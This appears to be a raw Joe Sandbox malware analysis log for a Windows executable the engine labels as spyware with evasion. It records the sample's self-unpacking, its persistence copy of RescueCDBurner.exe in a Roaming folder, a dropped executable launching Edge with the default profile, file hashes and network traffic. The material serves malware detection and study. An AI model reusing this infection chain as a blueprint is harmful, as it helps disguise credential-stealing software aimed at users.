Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50095 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.7:50097 version: TLS 1.2
Source: C:\Users\user\Desktop\kXzODlqJak.exe | File deleted: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009642FB
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00969398
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009314C4
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009194F0
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009424F7
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0094940D
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0093469C
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0091F788
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009218D8
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0095C80C
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0094DAA4
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0094EC05
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00963E50
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00925F14
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001B42FB
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001B9398
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0019940D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001814C4
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001694F0
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001924F7
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0018469C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0016F788
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001AC80C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001718D8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0019DAA4
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_0019EC05
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001B3E50
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_00175F14
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D476D60
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D46A50C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D488444
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4764E8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D476100
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4803C5
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D475D2E
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D487D85
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D481E1A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D461931
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D475990
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D46182C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D487834
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4754FB
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4693D9
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4872E3
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C66ECCD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C639D65
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C64457E
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C633DD0
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C63867F
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C6397A0
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C638F83
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C637093
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C64911E
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C650919
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C6221F0
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C637270
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C6C7A5A
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C633A1C
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C63A2A7
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C67A3DD
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C6343A6
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: String function: 0091A2D7 appears 83 times
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: String function: 00911225 appears 865 times
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: String function: 00911228 appears 1402 times
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: String function: 00912ACF appears 56 times
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: String function: 009701DE appears 91 times
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: String function: 00957210 appears 33 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 6D447A7F appears 125 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 00162ACF appears 56 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 001A7210 appears 33 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 6D474745 appears 79 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 6D4746DC appears 355 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 6D4783C0 appears 42 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 001C01DE appears 91 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 00161225 appears 865 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 00161228 appears 1402 times
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: String function: 0016A2D7 appears 83 times
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: String function: 6C63B046 appears 49 times
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: String function: 6C630C80 appears 46 times
Source: LocalCtrl_alpha_v3.exe.5.dr | Static PE information: Resource name: ZIP type: Zip archive data (empty)
Source: oeqwwe.5.dr | Static PE information: Number of sections : 12 > 10
Source: qpfwaekftwavc.9.dr | Static PE information: Number of sections : 12 > 10
Source: kXzODlqJak.exe, 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000002.1484982553.0000000000200000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamelangue.exe4 vs kXzODlqJak.exe
Source: kXzODlqJak.exe, 00000002.00000002.1486147378.000000006D4AA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilenameTXFTNActiveX.DLLR vs kXzODlqJak.exe
Source: kXzODlqJak.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engine | Classification label: mal92.spyw.evad.winEXE@64/279@19/15
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0096A747 FormatMessageW,GetLastError,LocalFree
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0096B884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001BB884 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0096FE01 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0097699C FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009498F9 ChangeServiceConfigW,GetLastError
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Users\user\Desktop\kXzODlqJak.exe | File created: C:\Users\user~1\AppData\Local\Temp\Rubrician_20250109084129.cleanroom.log
Source: kXzODlqJak.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\cmd.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: kXzODlqJak.exe | ReversingLabs: Detection: 44%
Source: kXzODlqJak.exe | String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\kXzODlqJak.exe | File read: C:\Users\user\Desktop\kXzODlqJak.exe
Source: unknown | Process created: C:\Users\user\Desktop\kXzODlqJak.exe "C:\Users\user\Desktop\kXzODlqJak.exe"
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Process created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Process created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Process created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2180,i,768463352532878709,16600556330849448278,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2904 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7096 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5304 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7120 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: msxml3.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: feclient.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Section loaded: apphelp.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: wldp.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: profapi.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: userenv.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: msi.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: version.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: cabinet.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: msxml3.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: feclient.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: iertutil.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: wininet.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Section loaded: apphelp.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: apphelp.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: starburn.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: qtcore4.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: qtgui4.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: qtnetwork4.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: qtxml4.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: dbghelp.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: winmm.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: dbgcore.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: pla.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: pdh.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: tdh.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: cabinet.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: wevtapi.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: shdocvw.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: starburn.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtcore4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtgui4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtnetwork4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtxml4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
